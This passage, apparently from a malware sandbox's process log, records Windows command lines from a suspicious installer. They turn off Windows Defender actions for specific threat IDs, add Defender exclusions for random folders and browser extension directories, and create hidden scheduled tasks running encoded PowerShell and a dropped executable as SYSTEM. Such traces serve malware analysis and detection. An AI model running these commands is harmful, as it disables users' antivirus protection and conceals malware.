REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3020 /prefetch:1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64

C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MovZspCuTpPaC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\MovZspCuTpPaC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RXHKfDSqirfU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RXHKfDSqirfU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYkefsiHU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\RYkefsiHU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XImIZWEzCDUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\XImIZWEzCDUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eAyGpXrokhrqbyVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\eAyGpXrokhrqbyVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\UvGNNHxtLtcCkoYu\" /t REG_DWORD /d 0 /reg:64;"

C:\Users\Admin\AppData\Local\Temp\setup.exe

"C:\Users\Admin\AppData\Local\Temp\setup.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6932 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7124 /prefetch:1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\MovZspCuTpPaC" /t REG_DWORD /d 0 /reg:64

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6652 /prefetch:1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RXHKfDSqirfU2" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RXHKfDSqirfU2" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYkefsiHU" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\RYkefsiHU" /t REG_DWORD /d 0 /reg:64

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=6040 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5600 /prefetch:8

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XImIZWEzCDUn" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\XImIZWEzCDUn" /t REG_DWORD /d 0 /reg:64

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=25 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5568 /prefetch:1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\zVzqvyOSihYKJvOyVZR" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eAyGpXrokhrqbyVB /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\ProgramData\eAyGpXrokhrqbyVB /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:32

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6664 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2092,14560669672520416610,7119749808385934309,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5288 /prefetch:1

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions" /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Users\Admin\AppData\Local\Temp\biDkmZKUdoGBvHzxU /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UvGNNHxtLtcCkoYu /t REG_DWORD /d 0 /reg:32

C:\Windows\SysWOW64\reg.exe

"C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v C:\Windows\Temp\UvGNNHxtLtcCkoYu /t REG_DWORD /d 0 /reg:64

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "gsWrlrtjW" /SC once /ST 06:11:09 /F /RU "Admin" /TR "powershell -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA=="

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "gsWrlrtjW"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE -WindowStyle Hidden -EncodedCommand cwB0AGEAcgB0AC0AcAByAG8AYwBlAHMAcwAgAC0AVwBpAG4AZABvAHcAUwB0AHkAbABlACAASABpAGQAZABlAG4AIABnAHAAdQBwAGQAYQB0AGUALgBlAHgAZQAgAC8AZgBvAHIAYwBlAA==

C:\Windows\system32\gpupdate.exe

"C:\Windows\system32\gpupdate.exe" /force

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc

C:\Windows\system32\svchost.exe

C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum

C:\Windows\system32\gpscript.exe

gpscript.exe /RefreshSystemParam

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAAAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2828 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:2

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3092 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-sandbox --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3120 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:8

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --first-renderer-process --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3196 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3216 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe

"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --log-severity=disable --user-agent="Mozilla/5.0 (Android 14; Mobile; rv:126.0) Gecko/126.0 Firefox/126.0" --user-data-dir="C:\Users\Admin\AppData\Local\CEF\User Data" --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4184 --field-trial-handle=2836,i,13151437112617325844,16789092778118196968,262144 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,DocumentPictureInPictureAPI /prefetch:1

C:\Windows\SysWOW64\schtasks.exe

schtasks /DELETE /F /TN "gsWrlrtjW"

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /TN "IdVtZOOUCgewbUgTH" /SC once /ST 03:43:27 /RU "SYSTEM" /TR "\"C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe\" E6 /zxJZdidom 757674 /S" /V1 /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /run /I /tn "IdVtZOOUCgewbUgTH"

C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe

C:\Windows\Temp\UvGNNHxtLtcCkoYu\nIQrclfOpSjLQHO\bhORNvE.exe E6 /zxJZdidom 757674 /S

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 656 -p 2928 -ip 2928

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2928 -s 816

C:\Windows\SysWOW64\cmd.exe

